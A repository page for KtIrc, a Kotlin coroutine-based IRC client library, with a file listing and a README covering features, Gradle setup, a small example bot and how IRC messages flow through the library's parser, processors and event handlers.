If you specify a bus object as the data type for this block, do not set the minimum value for bus data on the block. Simulink ignores this setting. Instead, set the minimum values for bus elements of the bus object specified as the data type. For information on the Minimum parameter for a bus element, see Simulink.BusElement (Simulink).
Simulink uses the minimum to perform:
Note
Output minimum does not saturate or clip the actual output signal. Use the Saturation (Simulink) block instead.
Programmatic Use
Block Parameter: OutMin
Type: character vector
Values: scalar
Default: '[ ]'
Specify the upper value of the output range that Simulink checks as a finite, real, double, scalar value.
Note
If you specify a bus object as the data type for this block, do not set the maximum value for bus data on the block. Simulink ignores this setting. Instead, set the maximum values for bus elements of the bus object specified as the data type. For information on the Maximum parameter for a bus element, see Simulink.BusElement (Simulink).
Simulink uses the maximum value to perform:
Note
Output maximum does not saturate or clip the actual output signal. Use the Saturation (Simulink) block instead.
Programmatic Use
Block Parameter: OutMax
Type: character vector
Values: scalar
Default: '[ ]'
Specify the output data type. The type can be inherited, specified directly, or expressed as a data type object such as Simulink.NumericType.
Click the Show data type assistant button to display the Data Type Assistant, which helps you set the data type attributes. For more information, see Specify Data Types Using Data Type Assistant (Simulink).
Programmatic Use
Block Parameter: OutDataTypeStr
Type: character vector
Values: 'Inherit: Inherit from 'Constant value'' | 'Inherit: Inherit via back propagation' | 'double' | 'single' | 'half' | 'int8' | 'uint8' | 'int16' | 'uint16' | 'int32' | 'uint32' | 'int64' | 'uint64' | 'boolean' | 'fixdt(1,16)' | 'fixdt(1,16,0)' | 'fixdt(1,16,2^0,0)' | 'Enum: <class name>' | 'Bus: <object name>'
Default: 'Inherit: Inherit from 'Constant value''
Select this parameter to prevent the fixed-point tools from overriding the Output data type you specify on the block. For more information, see Use Lock Output Data Type Setting (Fixed-Point Designer).
Programmatic Use
Block Parameter: LockScale
Type: character vector
Values: 'off' | 'on'
Default: 'off'
Block Characteristics
Data Types
Boolean | bus | double | enumerated | fixed point | half | integer | single
Direct Feedthrough
no
Multidimensional Signals
yes
Variable-Size Signals
no
Zero-Crossing Detection
no
Extended Capabilities
C/C++ Code Generation
Generate C and C++ code using Simulink® Coder™.
PLC Code Generation
Generate Structured Text code using Simulink® PLC Coder™.
Fixed-Point Conversion
Design and simulate fixed-point systems using Fixed-Point Designer™.
Introduced before R2006a
|
__label__pos
| 0.702908 |
Preguntas de entrevistas para Senior software developer | Glassdoor.com.ar
Preguntas de entrevistas para Senior software developer
89
Preguntas de entrevista para senior software developer compartidas por los candidatos
Preguntas de entrevista principales
Ordenar: RelevanciaPopular Fecha
Given an array of size n with range of numbers from 1 to n+1. The array doesn’t contain any duplicate, one number is missing, find the missing number.
2 respuestas
Traverse, use absolute value on each element as index, make the value at index as negative to mark it. If already marked negative, then is a repeating element. For missing ones, traverse again and check for positive values instead. #include #include void printTwoElements(int arr[], int size) { int i; printf("\n element repeating: "); for(i = 0; i 0) { arr[abs(arr[i])-1] = -arr[abs(arr[i])-1]; } else { printf(" %d ", abs(arr[i])); } } printf("\n missing one: "); for(i=0; i0) { printf("%d",i+1); } } } /* test method */ int main() { int arr[] = {7, 3, 4, 5, 5, 6, 2}; int n = sizeof(arr)/sizeof(arr[0]); printTwoElements(arr, n); return 0; }
^ description says there is no duplicate. So the answer here is wrong. If the numbers are ordered, then you can just make a binary search and check the (index + 1) matches value for that index until you find the missing one (i.e the first one that does not matches within the array). That's likely the fastest way O(logN).
how would I implement a reversible map in java
2 respuestas
Can you tell me a little about yourself? Why do you like to work here? Tell me about your most recent project? Any personal projects using Microsoft technology?
1 respuesta
English speaking
1 respuesta
What is the time complexity of Binary Search
1 respuesta
How to write an efficient method to calculate x raise to the power n, implement test method as well
1 respuesta
Given a number n, print all primes smaller than or equal to n. It is also given that n is a small number.
1 respuesta
Qué perfil de puesto estaba buscando y remuneración bruta pretendida.
1 respuesta
The difference between class and object
1 respuesta
How does Node handle multiple threads?
1 respuesta
110 de 89 Preguntas de entrevistas
|
__label__pos
| 0.999831 |
Composite Output Table Template
Overview and Key Concepts
This composite template creates a table chart with a column that displays the combined throughput (usually output) of all included objects.
For more information about composite Output templates, see Output Templates.
Properties Panels
The Composite Output Table template uses the following properties panels:
|
__label__pos
| 0.981928 |
How to sum cells by criteria
Excel 365
Use SUMIF if you need to sum values for a particular person or another criterion.
To sum cells by criteria, do the following:
1. Select the cell that will contain the result.
SUMIF example Excel 2016
2. Do one of the following:
• On the Formula tab, in the Function Library group, select the Math & Trig button:
Formula Excel 2016
Choose SUMIF in the list.
• Click the Insert Function button Insert Function button in the left of the Formula bar:
Edit bar Excel 2016
In the Insert Function dialog box:
Insert Function in Excel 2016
• select Math & Trig in the Or select a category drop-down list,
• select SUMIF in the Select a function list.
3. In the Function Arguments dialog box:
• The Range field determines the range of cells Excel will look to perform the count in. In this example, the cell range is B2:B21.
• The Criteria is a conditional statement that is similar to the conditional statement in the IF statement.
• The Sum_range field tells Excel which cells to add when the criteria are met for each cell in the range. In this example, the cell range is D2:D21.
4. Press OK.
Notes:
• You can enter this formula using the keyboard, for this example:
= SUMIF (B2:B21, "*Revay", D2:D21)
• You can use the wildcard characters, question mark (?), the asterisk (*) in the criteria. A question mark matches any single character; an asterisk matches any sequence of characters. If you want to find an actual question mark or asterisk, type a tilde (~) before the character. For example:
Mark example Excel 2016
• Microsoft Excel provides additional functions that can be used to analyze your data based on a condition or criteria:
• To count the number of occurrences of a string of text or a number within a range of cells, use the COUNTIF function (see How to count cells by criteria for more details).
• To have a formula return one of two values based on a condition, use the IF function.
• To analyze data in a list based on criteria, such as profit margins or product types, use the database and list management functions (DCOUNT, DCOUNTA, DSUM, etc.).
See also this tip in French: Comment calculer la somme des cellules par critères.
Please, disable AdBlock and reload the page to continue
Today, 30% of our visitors use Ad-Block to block ads.We understand your pain with ads, but without ads, we won't be able to provide you with free content soon. If you need our content for work or study, please support our efforts and disable AdBlock for our site. As you will see, we have a lot of helpful information to share.
|
__label__pos
| 0.995145 |
4
I want to draw a diagram like below, but I don't know how to draw an arrow that from one block to two blocks, like the one to source1/source2 and how to draw an arrow from two blocks to one block, like the one from source1/source2. Could someone help me please! enter image description here
This is what I can do to my best:
\tikzstyle{rect} = [draw, rectangle, minimum height = 4em, text width = 6em, text centered]
\tikzstyle{line} = [draw, -latex']
\begin{figure}
\begin{center}
\begin{tikzpicture}[node distance = 3cm, auto]
\node[rect](signal) {Signal};
\node[rect, right of=signal](STFT) {STFT};
\node[rect, right of=STFT](sep) {DNN/RNN};
\node[rect, right of=sep](speech) {$Source_1$};
\node[rect, below of=speech](music) {$Source_2$};
\node[rect, below of=sep](mask) {Time Frequencey Masking};
\node[rect, left of=mask](ISTFT) {ISTFT};
\node[rect, left of=ISTFT](eval) {Evaluation};
\path[line] (signal) -- (STFT);
\path[line] (STFT) -- (sep);
\path[line] (sep) -- (speech);
\path[line] (sep) -- (music);
\path[line] (mask) -- (ISTFT);
\path[line] (ISTFT) -- (eval);
\end{tikzpicture}
\end{center}
\end{figure}
3
• Please show us a partial solution you have tried.
– Matsmath
Jun 2, 2016 at 2:45
• Welcome! If you provide the code for the diagram without the problematic arrows, somebody will be happy to show you how to do the arrows. It isn't really fair to expect people to draw the whole thing from scratch. There are a lot of questions about drawing this kind of diagram, though, so it is puzzling that you've not found anything to help already.
– cfr
Jun 2, 2016 at 2:46
• 2
Personally, I don't think the diagram is very clear as it is drawn at all. Why is there an arrow from nowhere to Time Frequency Masking? That doesn't make sense to me. But maybe this is standard notation and nothingness has special symbolic value here.
– cfr
Jun 2, 2016 at 2:51
1 Answer 1
7
Something like this:
enter image description here
Code:
\documentclass[tikz, border=3mm]{standalone}
\usetikzlibrary{arrows, chains, fit, positioning, scopes}
\begin{document}
\begin{tikzpicture}[
> = angle 90,
node distance = 6mm and 8mm,
box/.style = {draw, minimum height=10mm, minimum width=27mm,
align=center, join=by ->, on chain},
font = \sffamily
]
{ [start chain = A going right]
\node[on chain] {Signal};
\node[box] {STFT/log-mel};
\node[box] {DNN/RNN};
}
{ [start chain = B going left]
\node[box,below=of A-3]
{Time Frequency\\ Masking};
\node[box] {ISTFT};
\node[box] {Evaluation};
}
\node (s1) [right=of A-3.north east] {Source\textsubscript{1}};
\node (s2) [right=of A-3.south east] {Source\textsubscript{2}};
%
\node[draw, dotted, inner sep = 5mm, xshift=1mm, fit=(A-3) (B-1) (s1)] {};
\draw (A-3.east) -- ++ (4mm,0) coordinate (s0);
\draw[->] (s0) |- (s1);
\draw[->] (s0) |- (s2);
\draw[->] (A-3 -| s1.east) -- + (4mm,0) |- (B-1);
\end{tikzpicture}
\end{document}
Nodes position is determined by use of library chains and scope. Formed are two chains: A and B. Arrows between nodes in chains are drawn by option join=by -> in box style. Arrows, which connect chain A with nodes "Source_1" and "Source_2" are drawn separately. Syntax |- is used in drawing perpendicular lines.
Edit: I notice a spelling error, which is now corrected. It correction I exploit also for slightly changes drawings (all nodes are now the same size).
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.999317 |
Development *********** This page describes the development of :mod:`sdmx`. Contributions are welcome! - For current development priorities, see the list of `GitHub milestones `_ and issues/PRs targeted to each. - For wishlist features, see issues on GitHub tagged `‘enh’ `_ or `‘wishlist’ `_. .. _code-style: Code style ========== - This project uses, via `pre-commit `_: - `ruff `_ for code style and linting, including: - ensure `PEP 8 `_ compliance, and - ensure a consistent order for imports (superseding `flake8 `_ and `isort `_). - `mypy `_ for static type checking. These **must** be applied to new or modified code. This can be done manually, or through code editor plug-ins. `Pre-commit hooks for git `_ can be installed via: .. code-block:: shell pip install pre-commit pre-commit install These will ensure that each commit is compliant with the code style. - The `pytest.yaml GitHub Actions workflow `_ checks code quality for pull requests and commits. This check **must** pass for pull requests to be merged. - Follow `the 7 rules of a great Git commit message `_. - Write docstrings in the `numpydoc `_ style. .. _testing: Test specimens ============== .. versionadded:: 2.0 A variety of *specimens*—example files from real web services, or published with the standards—are used to test that :mod:`sdmx` correctly reads and writes the different SDMX message formats. Since v2.0, specimens are stored in the separate `sdmx-test-data `_ repository. Running the test suite requires these files. To retrieve them, use one of the following methods: 1. Obtain the files by one of two methods: a. Clone ``khaeru/sdmx-test-data``:: $ git clone [email protected]:khaeru/sdmx-test-data.git b. Download https://github.com/khaeru/sdmx-test-data/archive/main.zip 2. Indicate where pytest can find the files, by one of two methods: a. Set the `SDMX_TEST_DATA` environment variable:: # Set the variable only for one command $ SDMX_TEST_DATA=/path/to/files pytest # Export the variable to the environment $ export SDMX_TEST_DATA $ pytest b. Give the option ``--sdmx-test-data=`` when invoking pytest:: $ pytest --sdmx-test-data=/path/to/files The files are: - Arranged in directories with names matching particular sources in :file:`sources.json`. - Named with: - Certain keywords: - ``-structure``: a structure message, often associated with a file with a similar name containing a data message. - ``ts``: time-series data, i.e. with a TimeDimensions at the level of individual Observations. - ``xs``: cross-sectional data arranged in other ways. - ``flat``: flat DataSets with all Dimensions at the Observation level. - ``ss``: structure-specific data messages. - In some cases, the query string or data flow/structure ID as the file name. - Hyphens ``-`` instead of underscores ``_``. Releasing ========= Before releasing, check: - https://github.com/khaeru/sdmx/actions?query=workflow:test+branch:main to ensure that the push and scheduled builds are passing. - https://readthedocs.org/projects/sdmx1/builds/ to ensure that the docs build is passing. Address any failures before releasing. 1. Create a new branch:: $ git checkout -v release/X.Y.Z 2. Edit :file:`doc/whatsnew.rst`. Comment the heading "Next release", then insert another heading below it, at the same level, with the version number and date. 3. Make a commit with a message like "Mark vX.Y.Z in doc/whatsnew". 4. Tag the version as a release candidate, i.e. with a ``rcN`` suffix, and push:: $ git tag vX.Y.ZrcN $ git push --tags --set-upstream origin release/X.Y.Z 5. Open a pull request with the title “Release vX.Y.Z” using this branch. Check: - at https://github.com/khaeru/sdmx/actions?query=workflow:publish that the workflow completes: the package builds successfully and is published to TestPyPI. - at https://test.pypi.org/project/sdmx1/ that: - The package can be downloaded, installed and run. - The README is rendered correctly. If needed, address any warnings or errors that appear and then continue from step (3), i.e. make (a) new commit(s) and tag, incrementing the release candidate number, e.g. from ``rc1`` to ``rc2``. 6. Merge the PR using the “rebase and merge” method. 7. (optional) Tag the release itself and push:: $ git tag vX.Y.Z $ git push --tags origin main This step (but *not* step (3)) can also be performed directly on GitHub; see (7), next. 8. Visit https://github.com/khaeru/sdmx/releases and mark the new release: either using the pushed tag from (7), or by creating the tag and release simultaneously. 9. Check at https://github.com/khaeru/sdmx/actions?query=workflow:publish and https://pypi.org/project/sdmx1/ that the distributions are published. Internal code reference ======================= .. automodule:: sdmx.dictlike :noindex: :undoc-members: :show-inheritance: ``testing``: Testing utilities ------------------------------ .. automodule:: sdmx.testing :members: :undoc-members: :show-inheritance: ``util``: Utilities ------------------- .. automodule:: sdmx.util :noindex: :undoc-members: :show-inheritance: Inline TODOs ============ .. todolist::
|
__label__pos
| 0.886329 |
cancel
Showing results for
Search instead for
Did you mean:
cancel
Showing results for
Search instead for
Did you mean:
Special characters get corrupted
JAZOZevenaarbv
5-Regular Member
Special characters get corrupted
With Wildfire 4.0 we're having trouble with special characters like Ø, ü, é.
We are using Wildfire 4.0 x64, Intralink 3.4 M040, Windows 7 x64
This is what happens:
1. make a new Part
2. select a designated parameter and change it's value to a text containing some special characters
3. save the part
4. erase everything from memory
5. open the part
6. examine the parameter value, it's different now
Before
AfterBefore_save.jpg
After_open.jpg
Anyone any idea why this is happening?
This thread is inactive and closed by the PTC Community Management Team. If you would like to provide a reply and re-open this thread, please notify the moderator and reference the thread. You may also use "Start a topic" button to ask a new question. Please be sure to include what version of the PTC product you are using so another community member knowledgeable about your version may be able to assist.
0 REPLIES 0
Announcements
|
__label__pos
| 0.867951 |
View Javadoc
1 package ca.uhn.fhir.jpa.dao;
2
3 /*
4 * #%L
5 * HAPI FHIR JPA Server
6 * %%
7 * Copyright (C) 2014 - 2018 University Health Network
8 * %%
9 * Licensed under the Apache License, Version 2.0 (the "License");
10 * you may not use this file except in compliance with the License.
11 * You may obtain a copy of the License at
12 *
13 * http://www.apache.org/licenses/LICENSE-2.0
14 *
15 * Unless required by applicable law or agreed to in writing, software
16 * distributed under the License is distributed on an "AS IS" BASIS,
17 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 * See the License for the specific language governing permissions and
19 * limitations under the License.
20 * #L%
21 */
22
23 import ca.uhn.fhir.context.FhirContext;
24 import ca.uhn.fhir.context.RuntimeResourceDefinition;
25 import ca.uhn.fhir.context.RuntimeSearchParam;
26 import ca.uhn.fhir.jpa.search.JpaRuntimeSearchParam;
27 import ca.uhn.fhir.util.StopWatch;
28 import ca.uhn.fhir.rest.api.server.IBundleProvider;
29 import ca.uhn.fhir.util.SearchParameterUtil;
30 import org.apache.commons.lang3.StringUtils;
31 import org.apache.commons.lang3.time.DateUtils;
32 import org.hl7.fhir.instance.model.api.IBaseResource;
33 import org.slf4j.Logger;
34 import org.slf4j.LoggerFactory;
35 import org.springframework.beans.BeansException;
36 import org.springframework.beans.factory.annotation.Autowired;
37 import org.springframework.context.ApplicationContext;
38 import org.springframework.context.ApplicationContextAware;
39 import org.springframework.scheduling.annotation.Scheduled;
40
41 import javax.annotation.PostConstruct;
42 import java.util.*;
43
44 import static org.apache.commons.lang3.StringUtils.isBlank;
45
46 public abstract class BaseSearchParamRegistry<SP extends IBaseResource> implements ISearchParamRegistry, ApplicationContextAware {
47
48 private static final int MAX_MANAGED_PARAM_COUNT = 10000;
49 private static final Logger ourLog = LoggerFactory.getLogger(BaseSearchParamRegistry.class);
50 private Map<String, Map<String, RuntimeSearchParam>> myBuiltInSearchParams;
51 private volatile Map<String, List<JpaRuntimeSearchParam>> myActiveUniqueSearchParams = Collections.emptyMap();
52 private volatile Map<String, Map<Set<String>, List<JpaRuntimeSearchParam>>> myActiveParamNamesToUniqueSearchParams = Collections.emptyMap();
53 @Autowired
54 private FhirContext myCtx;
55 private Collection<IFhirResourceDao<?>> myResourceDaos;
56 private volatile Map<String, Map<String, RuntimeSearchParam>> myActiveSearchParams;
57 @Autowired
58 private DaoConfig myDaoConfig;
59 private volatile long myLastRefresh;
60 private ApplicationContext myApplicationContext;
61
62 public BaseSearchParamRegistry() {
63 super();
64 }
65
66 @Override
67 public void requestRefresh() {
68 synchronized (this) {
69 myLastRefresh = 0;
70 }
71 }
72
73 @Override
74 public void forceRefresh() {
75 requestRefresh();
76 refreshCacheIfNecessary();
77 }
78
79 @Override
80 public RuntimeSearchParam getActiveSearchParam(String theResourceName, String theParamName) {
81 RuntimeSearchParam retVal = null;
82 Map<String, RuntimeSearchParam> params = getActiveSearchParams().get(theResourceName);
83 if (params != null) {
84 retVal = params.get(theParamName);
85 }
86 return retVal;
87 }
88
89
90 @Override
91 public Map<String, Map<String, RuntimeSearchParam>> getActiveSearchParams() {
92 return myActiveSearchParams;
93 }
94
95 @Override
96 public Map<String, RuntimeSearchParam> getActiveSearchParams(String theResourceName) {
97 return myActiveSearchParams.get(theResourceName);
98 }
99
100 @Override
101 public List<JpaRuntimeSearchParam> getActiveUniqueSearchParams(String theResourceName) {
102 List<JpaRuntimeSearchParam> retVal = myActiveUniqueSearchParams.get(theResourceName);
103 if (retVal == null) {
104 retVal = Collections.emptyList();
105 }
106 return retVal;
107 }
108
109 @Override
110 public List<JpaRuntimeSearchParam> getActiveUniqueSearchParams(String theResourceName, Set<String> theParamNames) {
111
112 Map<Set<String>, List<JpaRuntimeSearchParam>> paramNamesToParams = myActiveParamNamesToUniqueSearchParams.get(theResourceName);
113 if (paramNamesToParams == null) {
114 return Collections.emptyList();
115 }
116
117 List<JpaRuntimeSearchParam> retVal = paramNamesToParams.get(theParamNames);
118 if (retVal == null) {
119 retVal = Collections.emptyList();
120 }
121 return Collections.unmodifiableList(retVal);
122 }
123
124 public Map<String, Map<String, RuntimeSearchParam>> getBuiltInSearchParams() {
125 return myBuiltInSearchParams;
126 }
127
128 private Map<String, RuntimeSearchParam> getSearchParamMap(Map<String, Map<String, RuntimeSearchParam>> searchParams, String theResourceName) {
129 Map<String, RuntimeSearchParam> retVal = searchParams.get(theResourceName);
130 if (retVal == null) {
131 retVal = new HashMap<>();
132 searchParams.put(theResourceName, retVal);
133 }
134 return retVal;
135 }
136
137 public abstract IFhirResourceDao<SP> getSearchParameterDao();
138
139 private void populateActiveSearchParams(Map<String, Map<String, RuntimeSearchParam>> theActiveSearchParams) {
140 Map<String, List<JpaRuntimeSearchParam>> activeUniqueSearchParams = new HashMap<>();
141 Map<String, Map<Set<String>, List<JpaRuntimeSearchParam>>> activeParamNamesToUniqueSearchParams = new HashMap<>();
142
143 Map<String, RuntimeSearchParam> idToRuntimeSearchParam = new HashMap<>();
144 List<JpaRuntimeSearchParam> jpaSearchParams = new ArrayList<>();
145
146 /*
147 * Loop through parameters and find JPA params
148 */
149 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextResourceNameToEntries : theActiveSearchParams.entrySet()) {
150 List<JpaRuntimeSearchParam> uniqueSearchParams = activeUniqueSearchParams.get(nextResourceNameToEntries.getKey());
151 if (uniqueSearchParams == null) {
152 uniqueSearchParams = new ArrayList<>();
153 activeUniqueSearchParams.put(nextResourceNameToEntries.getKey(), uniqueSearchParams);
154 }
155 Collection<RuntimeSearchParam> nextSearchParamsForResourceName = nextResourceNameToEntries.getValue().values();
156 for (RuntimeSearchParam nextCandidate : nextSearchParamsForResourceName) {
157
158 if (nextCandidate.getId() != null) {
159 idToRuntimeSearchParam.put(nextCandidate.getId().toUnqualifiedVersionless().getValue(), nextCandidate);
160 }
161
162 if (nextCandidate instanceof JpaRuntimeSearchParam) {
163 JpaRuntimeSearchParam nextCandidateCasted = (JpaRuntimeSearchParam) nextCandidate;
164 jpaSearchParams.add(nextCandidateCasted);
165 if (nextCandidateCasted.isUnique()) {
166 uniqueSearchParams.add(nextCandidateCasted);
167 }
168 }
169 }
170
171 }
172
173 Set<String> haveSeen = new HashSet<>();
174 for (JpaRuntimeSearchParam next : jpaSearchParams) {
175 if (!haveSeen.add(next.getId().toUnqualifiedVersionless().getValue())) {
176 continue;
177 }
178
179 Set<String> paramNames = new HashSet<>();
180 for (JpaRuntimeSearchParam.Component nextComponent : next.getComponents()) {
181 String nextRef = nextComponent.getReference().getReferenceElement().toUnqualifiedVersionless().getValue();
182 RuntimeSearchParam componentTarget = idToRuntimeSearchParam.get(nextRef);
183 if (componentTarget != null) {
184 next.getCompositeOf().add(componentTarget);
185 paramNames.add(componentTarget.getName());
186 } else {
187 ourLog.warn("Search parameter {} refers to unknown component {}", next.getId().toUnqualifiedVersionless().getValue(), nextRef);
188 }
189 }
190
191 if (next.getCompositeOf() != null) {
192 Collections.sort(next.getCompositeOf(), new Comparator<RuntimeSearchParam>() {
193 @Override
194 public int compare(RuntimeSearchParam theO1, RuntimeSearchParam theO2) {
195 return StringUtils.compare(theO1.getName(), theO2.getName());
196 }
197 });
198 for (String nextBase : next.getBase()) {
199 if (!activeParamNamesToUniqueSearchParams.containsKey(nextBase)) {
200 activeParamNamesToUniqueSearchParams.put(nextBase, new HashMap<Set<String>, List<JpaRuntimeSearchParam>>());
201 }
202 if (!activeParamNamesToUniqueSearchParams.get(nextBase).containsKey(paramNames)) {
203 activeParamNamesToUniqueSearchParams.get(nextBase).put(paramNames, new ArrayList<JpaRuntimeSearchParam>());
204 }
205 activeParamNamesToUniqueSearchParams.get(nextBase).get(paramNames).add(next);
206 }
207 }
208 }
209
210 myActiveUniqueSearchParams = activeUniqueSearchParams;
211 myActiveParamNamesToUniqueSearchParams = activeParamNamesToUniqueSearchParams;
212 }
213
214 @PostConstruct
215 public void postConstruct() {
216 Map<String, Map<String, RuntimeSearchParam>> resourceNameToSearchParams = new HashMap<>();
217
218 myResourceDaos = new ArrayList<>();
219 Map<String, IFhirResourceDao> daos = myApplicationContext.getBeansOfType(IFhirResourceDao.class, false, false);
220 for (IFhirResourceDao next : daos.values()) {
221 myResourceDaos.add(next);
222 }
223
224 for (IFhirResourceDao<?> nextDao : myResourceDaos) {
225 RuntimeResourceDefinition nextResDef = myCtx.getResourceDefinition(nextDao.getResourceType());
226 String nextResourceName = nextResDef.getName();
227 HashMap<String, RuntimeSearchParam> nameToParam = new HashMap<>();
228 resourceNameToSearchParams.put(nextResourceName, nameToParam);
229
230 for (RuntimeSearchParam nextSp : nextResDef.getSearchParams()) {
231 nameToParam.put(nextSp.getName(), nextSp);
232 }
233 }
234
235 myBuiltInSearchParams = Collections.unmodifiableMap(resourceNameToSearchParams);
236
237 refreshCacheIfNecessary();
238 }
239
240 @Override
241 public void refreshCacheIfNecessary() {
242 long refreshInterval = 60 * DateUtils.MILLIS_PER_MINUTE;
243 if (System.currentTimeMillis() - refreshInterval > myLastRefresh) {
244 synchronized (this) {
245 if (System.currentTimeMillis() - refreshInterval > myLastRefresh) {
246 StopWatch sw = new StopWatch();
247
248 Map<String, Map<String, RuntimeSearchParam>> searchParams = new HashMap<>();
249 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextBuiltInEntry : getBuiltInSearchParams().entrySet()) {
250 for (RuntimeSearchParam nextParam : nextBuiltInEntry.getValue().values()) {
251 String nextResourceName = nextBuiltInEntry.getKey();
252 getSearchParamMap(searchParams, nextResourceName).put(nextParam.getName(), nextParam);
253 }
254 }
255
256 SearchParameterMap params = new SearchParameterMap();
257 params.setLoadSynchronousUpTo(MAX_MANAGED_PARAM_COUNT);
258
259 IBundleProvider allSearchParamsBp = getSearchParameterDao().search(params);
260 int size = allSearchParamsBp.size();
261
262 // Just in case..
263 if (size >= MAX_MANAGED_PARAM_COUNT) {
264 ourLog.warn("Unable to support >" + MAX_MANAGED_PARAM_COUNT + " search params!");
265 size = MAX_MANAGED_PARAM_COUNT;
266 }
267
268 List<IBaseResource> allSearchParams = allSearchParamsBp.getResources(0, size);
269 for (IBaseResource nextResource : allSearchParams) {
270 SP nextSp = (SP) nextResource;
271 if (nextSp == null) {
272 continue;
273 }
274
275 RuntimeSearchParam runtimeSp = toRuntimeSp(nextSp);
276 if (runtimeSp == null) {
277 continue;
278 }
279
280 for (String nextBaseName : SearchParameterUtil.getBaseAsStrings(myCtx, nextSp)) {
281 if (isBlank(nextBaseName)) {
282 continue;
283 }
284
285 Map<String, RuntimeSearchParam> searchParamMap = getSearchParamMap(searchParams, nextBaseName);
286 String name = runtimeSp.getName();
287 if (myDaoConfig.isDefaultSearchParamsCanBeOverridden() || !searchParamMap.containsKey(name)) {
288 searchParamMap.put(name, runtimeSp);
289 }
290
291 }
292 }
293
294 Map<String, Map<String, RuntimeSearchParam>> activeSearchParams = new HashMap<>();
295 for (Map.Entry<String, Map<String, RuntimeSearchParam>> nextEntry : searchParams.entrySet()) {
296 for (RuntimeSearchParam nextSp : nextEntry.getValue().values()) {
297 String nextName = nextSp.getName();
298 if (nextSp.getStatus() != RuntimeSearchParam.RuntimeSearchParamStatusEnum.ACTIVE) {
299 nextSp = null;
300 }
301
302 if (!activeSearchParams.containsKey(nextEntry.getKey())) {
303 activeSearchParams.put(nextEntry.getKey(), new HashMap<>());
304 }
305 if (activeSearchParams.containsKey(nextEntry.getKey())) {
306 ourLog.debug("Replacing existing/built in search param {}:{} with new one", nextEntry.getKey(), nextName);
307 }
308
309 if (nextSp != null) {
310 activeSearchParams.get(nextEntry.getKey()).put(nextName, nextSp);
311 } else {
312 activeSearchParams.get(nextEntry.getKey()).remove(nextName);
313 }
314 }
315 }
316
317 myActiveSearchParams = activeSearchParams;
318
319 populateActiveSearchParams(activeSearchParams);
320
321 myLastRefresh = System.currentTimeMillis();
322 ourLog.info("Refreshed search parameter cache in {}ms", sw.getMillis());
323 }
324 }
325 }
326 }
327
328 @Scheduled(fixedDelay = 10 * DateUtils.MILLIS_PER_SECOND)
329 public void refreshCacheOnSchedule() {
330 refreshCacheIfNecessary();
331 }
332
333 @Override
334 public void setApplicationContext(ApplicationContext theApplicationContext) throws BeansException {
335 myApplicationContext = theApplicationContext;
336 }
337
338 protected abstract RuntimeSearchParam toRuntimeSp(SP theNextSp);
339
340
341 }
|
__label__pos
| 0.9786 |
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Chris Smith e6e36b93cd Use openjdk12 not the non-existant oraclejdk12 3 months ago
docs More work on docs 5 months ago
gradle/wrapper Dependency updates 3 months ago
src Dependency updates 3 months ago
.gitignore Support message tags v3.3, replies 6 months ago
.travis.yml Use openjdk12 not the non-existant oraclejdk12 3 months ago
CHANGELOG.adoc Fix occasional buffer overflow on TLS connections 5 months ago
LICENCE.adoc Convert top level docs to asciidoc 5 months ago
README.adoc Convert top level docs to asciidoc 5 months ago
build.gradle.kts Dependency updates 3 months ago
gradlew Dependency updates 3 months ago
gradlew.bat Dependency updates 3 months ago
README.adoc
= KtIrc
Chris Smith
image:https://travis-ci.org/csmith/KtIrc.svg?branch=master[Build status, link=https://travis-ci.org/csmith/KtIrc]
image:https://api.codacy.com/project/badge/Grade/c01221cbf9cf413ba4d94cb8c80e334a[Code quality, link=https://www.codacy.com/app/csmith/KtIrc]
image:https://codecov.io/gh/csmith/KtIrc/branch/master/graph/badge.svg[Code coverage, link=https://codecov.io/gh/csmith/KtIrc]
image:https://api.bintray.com/packages/dmdirc/releases/ktirc/images/download.svg[Latest version, link=https://bintray.com/dmdirc/releases/ktirc/_latestVersion]
image:https://img.shields.io/badge/documentation-d11n-brightgreen.svg[Documentation, link=https://ktirc.d11n.dev/]
KtIrc is a Kotlin JVM library for connecting to and interacting with IRC servers.
It is still in an early stage of development.
== Features
.Built for Kotlin
KtIrc is written in and designed for use in Kotlin; it uses extension methods,
DSLs, sealed classes, and so on, to make it much easier to use than an
equivalent Java library.
.Coroutine-powered
KtIrc uses co-routines for all of its input/output which lets it deal with
IRC messages in the background while your app does other things, without
the overhead of creating a new thread per IRC client.
.Modern IRC standards
KtIrc supports many IRCv3 features such as SASL authentication, message IDs,
server timestamps, replies, reactions, account tags, and more. These features
(where server support is available) make it easier to develop bots and
clients, and enhance IRC with new user-facing functionality.
== Setup
KtIrc is published to JCenter, so adding it to a gradle build is as simple as:
[source,groovy]
----
repositories {
jcenter()
}
dependencies {
implementation("com.dmdirc:ktirc:<VERSION>")
}
----
== Usage
Clients are created using a DSL and the `IrcClient` function. At a minimum
you must specify a server and a profile. A simple bot might look like:
[source,kotlin]
----
val client = IrcClient {
server {
host = "my.server.com"
}
profile {
nickname = "nick"
username = "username"
realName = "Hi there"
}
}
client.onEvent { event ->
when (event) {
is ServerReady ->
client.sendJoin("#ktirc")
is ServerDisconnected ->
client.connect()
is MessageReceived ->
if (event.message == "!test")
client.reply(event, "Test successful!")
}
}
client.connect()
----
== Documentation
You can view the latest documentation for KtIrc at https://ktirc.d11n.dev/.
== Developing KtIrc
=== Lifecycle of a message
image:docs/sequence.png[Architecture diagram]
The `LineBufferedSocket` class receives bytes from the IRC server. Whenever it
encounters a complete line (terminated by a `CR`, `LF` or `CRLF`), it passes it
to the `IrcClient` as a `ByteArray`. The `MessageParser` breaks up the line
into its component parts (tags, prefixes, commands, and parameters) and returns
them as an `IrcMessage`.
The `IrcMessage` is given to the `MessageHandler`, which tries to find a
processor that can handle the command in the message. The processor's job is
to convert the message into an `IrcEvent` subclass. Processors do not get
given any contextual information or state, their job is simply to convert
the message as received into an event.
The events are returned to the `MessageHandler` which then passes them on
to all registered event handlers. The job of the event handlers is twofold:
firstly, use the events to update the state of KtIrc (for example, after
receiving a `JOIN` message, the `ChannelStateHandler` will add the user
to the list of users in the channel, while the `UserStateHandler` may update
the user's hostname if we hadn't previously seen it). Secondly, the event
handlers may themselves raise events. This is useful for higher-order
events such as `ServerReady` that depend on a variety of factors and
states.
Handlers themselves may not keep state, as they will be shared across
multiple instances of `IrcClient` and won't be reset on reconnection.
